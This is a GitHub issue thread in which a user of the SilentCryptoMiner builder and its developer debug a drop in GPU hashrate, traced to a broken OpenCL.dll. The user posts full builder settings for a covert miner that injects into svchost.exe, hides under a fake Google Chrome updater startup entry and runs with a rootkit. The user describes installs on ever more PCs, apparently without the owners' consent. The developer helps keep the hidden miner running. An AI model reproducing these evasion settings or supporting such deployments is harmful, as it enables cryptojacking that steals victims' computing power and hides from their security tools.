### ISSUE TITLE
3.3.0...Cause found

### ISSUE THREAD

**Issue by BugCatch-maker** [UnamSanctam/SilentCryptoMiner#1790]
decreasing since the update

I've been using your product for a long time, I've never had this problem before

XMR is normal, Only GPU ETC is like this

(I'm not using the Web Panel)

**Comment by UnamSanctam** [comment]
Are those the same computers? As in did you uninstall it from the computers and then install the new one?

**Comment by BugCatch-maker** [comment]
> Are those the same computers? As in did you uninstall it from the computers and then install the new one?

Yes, that’s right.

**Comment by UnamSanctam** [comment]
Hmm, the hashrate shouldn't be much different from before, I tested it on quite a few different GPUs. Can you post your settings?

**Comment by BugCatch-maker** [comment]
> Hmm, the hashrate shouldn't be much different from before, I tested it on quite a few different GPUs. Can you post your settings?

<?xml version="1.0" encoding="ks_c_5601-1987"?>
<Form>
  <Control Type="MephTheme" Name="formBuilder">
    <Visible>True</Visible>
    <Enabled>True</Enabled>
    <Control Type="MephTabcontrol" Name="tabcontrolBuilder">
      <Visible>True</Visible>
      <Enabled>True</Enabled>
      <Control Type="System.Windows.Forms.TabPage" Name="tabMain">
        <Visible>True</Visible>
        <Enabled>True</Enabled>
        <Control Type="MephComboBox" Name="comboLanguage">
          <Text>English</Text>
          <SelectedIndex>0</SelectedIndex>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnLoadState">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnSaveState">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephListBox" Name="listMiners">
          <Item Type="SilentCryptoMiner.MinerETH">
            <Control Type="MephTheme" Name="formMinerETH">
              <Visible>True</Visible>
              <Enabled>True</Enabled>
              <Control Type="MephTabcontrol" Name="tabcontrolMinerETH">
                <Visible>True</Visible>
                <Enabled>True</Enabled>
                <Control Type="System.Windows.Forms.TabPage" Name="tabConnection">
                  <Visible>True</Visible>
                  <Enabled>True</Enabled>
                  <Control Type="MephGroupBox" Name="groupOptional">
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                    <Control Type="MephTextBox" Name="txtPoolPassowrd">
                      <Text />
                      <Visible>True</Visible>
                      <Enabled>True</Enabled>
                    </Control>
                    <Control Type="MephTextBox" Name="txtPoolWorker">
                      <Text>?</Text>
                      <Visible>True</Visible>
                      <Enabled>True</Enabled>
                    </Control>
                    <Control Type="MephTextBox" Name="txtPoolData">
                      <Text />
                      <Visible>True</Visible>
                      <Enabled>True</Enabled>
                    </Control>
                  </Control>
                  <Control Type="MephGroupBox" Name="groupRequired">
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                    <Control Type="MephTextBox" Name="txtPoolURL">
                      <Text>asia-etc.2miners.com:11010</Text>
                      <Visible>True</Visible>
                      <Enabled>True</Enabled>
                    </Control>
                    <Control Type="MephTextBox" Name="txtPoolUsername">
                      <Text>?</Text>
                      <Visible>True</Visible>
                      <Enabled>True</Enabled>
                    </Control>
                    <Control Type="MephComboBox" Name="comboPoolScheme">
                      <Text>stratums (SSL/TLS)</Text>
                      <SelectedIndex>1</SelectedIndex>
                      <Visible>True</Visible>
                      <Enabled>True</Enabled>
                    </Control>
                  </Control>
                </Control>
                <Control Type="System.Windows.Forms.TabPage" Name="tabMining">
                  <Visible>False</Visible>
                  <Enabled>True</Enabled>
                  <Control Type="MephToggleSwitch" Name="toggleProcessKiller">
                    <Text />
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephComboBox" Name="comboAlgorithm">
                    <Text>etchash</Text>
                    <SelectedIndex>1</SelectedIndex>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephComboBox" Name="comboIdleGPU">
                    <Text>100%</Text>
                    <SelectedIndex>10</SelectedIndex>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephComboBox" Name="comboMaxGPU">
                    <Text>50%</Text>
                    <SelectedIndex>5</SelectedIndex>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephComboBox" Name="comboInjection">
                    <Text>svchost.exe</Text>
                    <SelectedIndex>5</SelectedIndex>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleStealth">
                    <Text />
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtIdleWait">
                    <Text>5</Text>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleIdle">
                    <Text />
                    <Checked>True</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                </Control>
                <Control Type="System.Windows.Forms.TabPage" Name="tabAdvanced">
                  <Visible>False</Visible>
                  <Enabled>True</Enabled>
                  <Control Type="MephToggleSwitch" Name="toggleStealthFullscreen">
                    <Text />
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephCheckBox" Name="chkAPI">
                    <Text>API Endpoint URL</Text>
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephCheckBox" Name="chkAdvParam">
                    <Text>Advanced Parameters</Text>
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephCheckBox" Name="chkRemoteConfig">
                    <Text>Remote Configuration</Text>
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtAPI">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>False</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtKillTargets">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtStealthTargets">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtAdvParam">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>False</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtRemoteConfig">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>False</Enabled>
                  </Control>
                </Control>
                <Control Type="System.Windows.Forms.TabPage" Name="tabJSON">
                  <Visible>False</Visible>
                  <Enabled>True</Enabled>
                  <Control Type="MephTextBox" Name="txtJSON">
                    <Text>{
    "url": "stratums://`?`.?@asia-etc.2miners.com:11010",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 5,
    "idle-gpu": 100,
    "stealth-targets": "",
    "kill-targets": "",
    "stealth-fullscreen": false
}</Text>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                </Control>
              </Control>
            </Control>
          </Item>
          <Item Type="SilentCryptoMiner.MinerXMR">
            <Control Type="MephTheme" Name="formMinerXMR">
              <Visible>True</Visible>
              <Enabled>True</Enabled>
              <Control Type="MephTabcontrol" Name="tabcontrolMinerXMR">
                <Visible>True</Visible>
                <Enabled>True</Enabled>
                <Control Type="System.Windows.Forms.TabPage" Name="tabConnection">
                  <Visible>False</Visible>
                  <Enabled>True</Enabled>
                  <Control Type="MephComboBox" Name="comboInjection">
                    <Text>svchost.exe</Text>
                    <SelectedIndex>5</SelectedIndex>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtPoolUsername">
                    <Text>?</Text>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtPoolURL">
                    <Text>xmr.2miners.com:12222</Text>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtPoolPassword">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                </Control>
                <Control Type="System.Windows.Forms.TabPage" Name="tabMining">
                  <Visible>False</Visible>
                  <Enabled>True</Enabled>
                  <Control Type="MephToggleSwitch" Name="toggleProcessKiller">
                    <Text />
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephComboBox" Name="comboAlgorithm">
                    <Text>rx/0</Text>
                    <SelectedIndex>0</SelectedIndex>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleStealth">
                    <Text />
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephComboBox" Name="comboIdleCPU">
                    <Text>80%</Text>
                    <SelectedIndex>8</SelectedIndex>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephComboBox" Name="comboMaxCPU">
                    <Text>20%</Text>
                    <SelectedIndex>2</SelectedIndex>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleSSL">
                    <Text />
                    <Checked>True</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleCPU">
                    <Text />
                    <Checked>True</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleNicehash">
                    <Text />
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleIdle">
                    <Text />
                    <Checked>True</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtIdleWait">
                    <Text>5</Text>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                </Control>
                <Control Type="System.Windows.Forms.TabPage" Name="tabAdvanced">
                  <Visible>False</Visible>
                  <Enabled>True</Enabled>
                  <Control Type="MephToggleSwitch" Name="toggleGPU">
                    <Text />
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleStealthFullscreen">
                    <Text />
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephCheckBox" Name="chkAPI">
                    <Text>API Endpoint URL</Text>
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephCheckBox" Name="chkAdvParam">
                    <Text>Advanced Parameters</Text>
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephCheckBox" Name="chkRemoteConfig">
                    <Text>Remote Configuration</Text>
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtAPI">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>False</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtKillTargets">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtStealthTargets">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtAdvParam">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>False</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtRemoteConfig">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>False</Enabled>
                  </Control>
                </Control>
                <Control Type="System.Windows.Forms.TabPage" Name="tabJSON">
                  <Visible>True</Visible>
                  <Enabled>True</Enabled>
                  <Control Type="MephTextBox" Name="txtJSON">
                    <Text>{
    "algo": "rx/0",
    "pool": "xmr.2miners.com",
    "port": 12222,
    "wallet": "?",
    "password": "",
    "nicehash": false,
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 5,
    "idle-cpu": 80,
    "stealth-targets": "",
    "kill-targets": "",
    "stealth-fullscreen": false
}</Text>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                </Control>
              </Control>
            </Control>
          </Item>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnMinerRemove">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnMinerEdit">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnMinerAdd">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
      </Control>
      <Control Type="System.Windows.Forms.TabPage" Name="tabStartup">
        <Visible>False</Visible>
        <Enabled>True</Enabled>
        <Control Type="System.Windows.Forms.PictureBox" Name="picAdmin4">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleRunSystem">
          <Text />
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtStartupFileName">
          <Text>Google\Chrome\updater_346346.exe</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleAutoDelete">
          <Text />
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleWatchdog">
          <Text />
          <Checked>True</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephCheckBox" Name="chkStartup">
          <Text>Enabled</Text>
          <Checked>True</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtStartupEntryName">
          <Text>GoogleUpdateTaskMachineQC_367326</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephComboBox" Name="txtStartupPath">
          <Text>AppData</Text>
          <SelectedIndex>0</SelectedIndex>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
      </Control>
      <Control Type="System.Windows.Forms.TabPage" Name="tabAssembly">
        <Visible>False</Visible>
        <Enabled>True</Enabled>
        <Control Type="MephCheckBox" Name="chkAssembly">
          <Text>Disabled</Text>
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnAssemblyRandom">
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyTitle">
          <Text>Title...</Text>
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnAssemblyClone">
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyProduct">
          <Text>Product...</Text>
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyVersion4">
          <Text>0</Text>
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyDescription">
          <Text>Description...</Text>
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyVersion3">
          <Text>0</Text>
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyCopyright">
          <Text>Copyright...</Text>
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyVersion2">
          <Text>0</Text>
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyCompany">
          <Text>Company...</Text>
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyVersion1">
          <Text>0</Text>
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyTrademark">
          <Text>Trademark...</Text>
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
      </Control>
      <Control Type="System.Windows.Forms.TabPage" Name="tabIcon">
        <Visible>False</Visible>
        <Enabled>True</Enabled>
        <Control Type="MephCheckBox" Name="chkIcon">
          <Text>Disabled</Text>
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="System.Windows.Forms.PictureBox" Name="picIcon">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnIconBrowse">
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtIconPath">
          <Text>Path to icon...</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
      </Control>
      <Control Type="System.Windows.Forms.TabPage" Name="tabSignature">
        <Visible>False</Visible>
        <Enabled>True</Enabled>
        <Control Type="MephTextBox" Name="txtSignatureData">
          <Text />
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnSignatureClone">
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnSignatureBrowse">
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtSignaturePath">
          <Text />
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephCheckBox" Name="chkSignature">
          <Text>Disabled</Text>
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
      </Control>
      <Control Type="System.Windows.Forms.TabPage" Name="tabOptions">
        <Visible>False</Visible>
        <Enabled>True</Enabled>
        <Control Type="System.Windows.Forms.PictureBox" Name="picAdmin5">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleProcessProtect">
          <Text />
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnAdvancedOptions">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="System.Windows.Forms.PictureBox" Name="picAdmin2">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleWindowsUpdate">
          <Text />
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="System.Windows.Forms.PictureBox" Name="picAdmin3">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephCheckBox" Name="chkBlockWebsites">
          <Text>Block Websites</Text>
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtBlockWebsites">
          <Text />
          <Visible>True</Visible>
          <Enabled>False</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleDisableSleep">
          <Text />
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleAdministrator">
          <Text />
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="System.Windows.Forms.PictureBox" Name="picAdmin1">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleWDExclusions">
          <Text />
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
      </Control>
      <Control Type="System.Windows.Forms.TabPage" Name="tabBuild">
        <Visible>False</Visible>
        <Enabled>True</Enabled>
        <Control Type="MephTextBox" Name="txtStartDelay">
          <Text>0</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtLog">
          <Text>Starting...
Building miner sets...
Extracting compilers...
Extracting miner files...
Converting resources...
Compiling Miner...
Compiling Uninstaller...
Compiling Checker...
Done!
</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnBuild">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
      </Control>
    </Control>
  </Control>
  <Control Type="MephTheme" Name="formAdvancedOptions">
    <Visible>True</Visible>
    <Enabled>True</Enabled>
    <Control Type="System.Windows.Forms.PictureBox" Name="pictureBox1">
      <Visible>True</Visible>
      <Enabled>True</Enabled>
    </Control>
    <Control Type="MephToggleSwitch" Name="toggleRootkit">
      <Text />
      <Checked>True</Checked>
      <Visible>True</Visible>
      <Enabled>True</Enabled>
    </Control>
    <Control Type="MephToggleSwitch" Name="toggleRunInstall">
      <Text />
      <Checked>True</Checked>
      <Visible>True</Visible>
      <Enabled>True</Enabled>
    </Control>
  </Control>
</Form>

**Comment by BugCatch-maker** [comment]
> Hmm, the hashrate shouldn't be much different from before, I tested it on quite a few different GPUs. Can you post your settings?

![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/28298702/3a4e14f1-3af1-421b-a92e-d270b037b80c)

I'm also using Rootkit
Again, XMR works fine GPU ETC Only Problem

(I am using a translator)

**Comment by UnamSanctam** [comment]
That's really weird, there can be a small difference since I switched from CUDA to only OpenCL in the miner (to be able to implement KawPow and ProgPow) but there shouldn't be a 30% difference of course. Since there's no web panel then it becomes a bit more difficult to debug. Are you sure the new miner was correctly installed on all the computers when you updated it? You can also try mining something with KawPow or ProgPowZ since they are quite a bit more profitable now https://whattomine.com/ (and also take less VRAM, for example Zano only uses around 1GB), though if you do keep in mind that they hashrates between algorithms aren't always comparable.

**Comment by BugCatch-maker** [comment]
> That's really weird, there can be a small difference since I switched from CUDA to only OpenCL in the miner (to be able to implement KawPow and ProgPow) but there shouldn't be a 30% difference of course. Since there's no web panel then it becomes a bit more difficult to debug. Are you sure the new miner was correctly installed on all the computers when you updated it? You can also try mining something with KawPow or ProgPowZ since they are quite a bit more profitable now https://whattomine.com/ (and also take less VRAM, for example Zano only uses around 1GB), though if you do keep in mind that they hashrates between algorithms aren't always comparable. I would recommend at least a "Remote Configuration" for that though.

The reason I'm sure it's installed is that the XMR has a higher hash rate than before(More PCs installed than ever before)
I doubted this version because the hash rate has never dropped since the update
But I'm sure the developer doesn't have that reason, so I'll keep looking for the problem on my end
I've been thinking about choosing GPU mining for something else, but I'm gonna have to change it to something else
Thank you for making a great program

**Comment by BugCatch-maker** [comment]
> That's really weird, there can be a small difference since I switched from CUDA to only OpenCL in the miner (to be able to implement KawPow and ProgPow) but there shouldn't be a 30% difference of course. Since there's no web panel then it becomes a bit more difficult to debug. Are you sure the new miner was correctly installed on all the computers when you updated it? You can also try mining something with KawPow or ProgPowZ since they are quite a bit more profitable now https://whattomine.com/ (and also take less VRAM, for example Zano only uses around 1GB), though if you do keep in mind that they hashrates between algorithms aren't always comparable. I would recommend at least a "Remote Configuration" for that though.

![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/28298702/126f1a1e-5b08-401a-869b-d92a44384a5c)
3.3.0
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/28298702/573e21e0-af61-4628-a497-f30cccdd381e)
3.2.0

Found cause, incompatible on some computers.

**Comment by UnamSanctam** [comment]
Huh, that's strange. Do you know if there's anything in common for the computers it isn't working on?

**Comment by BugCatch-maker** [comment]
> Huh, that's strange. Do you know if there's anything in common for the computers it isn't working on?

I don't know..🥺
I want to know why😞

**Comment by UnamSanctam** [comment]
Alright then, are you able to do some testing?
I'll need to know if the cause is the GPU miner or if the cause is the miner injector. Here is a miner builder version 3.2.0 that has the GPU miner from version 3.3.0: https://gofile.io/d/tHiiJ7
Can you try building a miner with that and see if it can run correctly on the computer where the miner doesn't work? If it does work then the problem is probably the miner injector, and if it doesn't work then it's probably the GPU miner.

**Comment by BugCatch-maker** [comment]
> Alright then, are you able to do some testing?
> 
> I'll need to know if the cause is the GPU miner or if the cause is the miner injector. Here is a miner builder version 3.2.0 that has the GPU miner from version 3.3.0: https://gofile.io/d/tHiiJ7
> 
> Can you try building a miner with that and see if it can run correctly on the computer where the miner doesn't work? If it does work then the problem is probably the miner injector, and if it doesn't work then it's probably the GPU miner.

![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/28298702/e33d286e-5db6-44ae-8dad-0ae15268d72e)
Only XMR is activated as before

**Comment by UnamSanctam** [comment]
Alright thank you, so it's not the injector. I'll have to see if I can find the cause, it's just a bit difficult to find when it works on all my machines.

**Comment by BugCatch-maker** [comment]
> Alright thank you, so it's not the injector. I'll have to see if I can find the cause, it's just a bit difficult to find when it works on all my machines.

Okay, I'll be waiting for good news!

**Comment by UnamSanctam** [comment]
I have created a debug version of the GPU miner now with a few things updated and changed, is it possible for you to extract the .zip and run the `start etc.bat` file on the computer that it wasn't working on to see what it says in the console? Here is the debug miner download: https://gofile.io/d/rvXnKE, it contains two files `ethminer.exe` and `start etc.bat`.

**Comment by BugCatch-maker** [comment]
> I have created a debug version of the GPU miner now with a few things updated and changed, is it possible for you to extract the .zip and run the `start etc.bat` file on the computer that it wasn't working on to see what it says in the console? Here is the debug miner download: https://gofile.io/d/rvXnKE, it contains two files `ethminer.exe` and `start etc.bat`.

![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/28298702/e404d8ad-85a1-4bf5-b3bd-1f65e92ca4f3)
Have you found the cause now?

**Comment by UnamSanctam** [comment]
Thank you that helps, if you check `C:\Windows\System32` is there an OpenCL.dll file there?

**Comment by BugCatch-maker** [comment]
> Thank you that helps, if you check `C:\Windows\System32` is there an OpenCL.dll file there? And if possible could you tell me what Nvidia GPU that computer has?

1.2.11.0
Khronos OpenCL IC
110k

File exists

**Comment by UnamSanctam** [comment]
Alright great so the driver exists at least, is it possible for you to send that OpenCL.dll here? And what GPU does that computer have?

**Comment by UnamSanctam** [comment]
Or even better if possible, could you try running clinfo [clinfo.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/12506165/clinfo.zip) and paste what it prints somewhere (when you run the bat file)?

**Comment by BugCatch-maker** [comment]
> Alright great so the driver exists at least, is it possible for you to send that OpenCL.dll here? And what GPU does that computer have?

https://gofile.io/d/nvjddT
The graphics card is the GTX M series

**Comment by BugCatch-maker** [comment]
> Or even better if possible, could you try running clinfo [clinfo.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/12506165/clinfo.zip) and paste what it prints somewhere (when you run the bat file)?
> 
> 

"Number of platforms                               0"
It looks like this

**Comment by UnamSanctam** [comment]
Okay so that means the loader cannot load the OpenCL drivers, either they don't exist or the loader is too outdated. Can you try running this? I have included a separate OpenCL.dll that it will try to use automatically instead:  [clinfo.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/12506226/clinfo.zip)

**Comment by BugCatch-maker** [comment]
> Okay so that means the loader cannot load the OpenCL drivers, either they don't exist or the loader is too outdated. Can you try running this? I have included a separate OpenCL.dll that it will try to use automatically instead:  [clinfo.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/12506226/clinfo.zip)
> 
> 

A lot of information is printed and the ethminer.exe file works fine.
OpenCL.dll was the problem!
When will the next update come out?

**Comment by UnamSanctam** [comment]
Alright that's great then, I'll try to create some good system to automatically get around any broken local OpenCL.dll. I'll probably finish it and release it later today or tomorrow.

**Comment by BugCatch-maker** [comment]
> Alright that's great then, I'll try to create some good system to automatically get around any broken local OpenCL.dll. I'll probably finish it and release it later today or tomorrow.

Okay, thank you, and if you can delete all the letters I wrote.I don't like to work in the released place.
Nice to meet you. Thank you for creating a good program.Let's say bye to each other later :)

**Comment by BugCatch-maker** [comment]
> Alright that's great then, I'll try to create some good system to automatically get around any outdated or broken local OpenCL.dll. I'll probably finish it and release it later today or tomorrow.

Okay. Thank you for making a good program

If possible, I'd like you to delete all my posts
I don't like being in public

I'll call you later if there's a problem. Take care :)

**Comment by UnamSanctam** [comment]
Sure, I'll delete the whole issue then in order to purge all the posts.
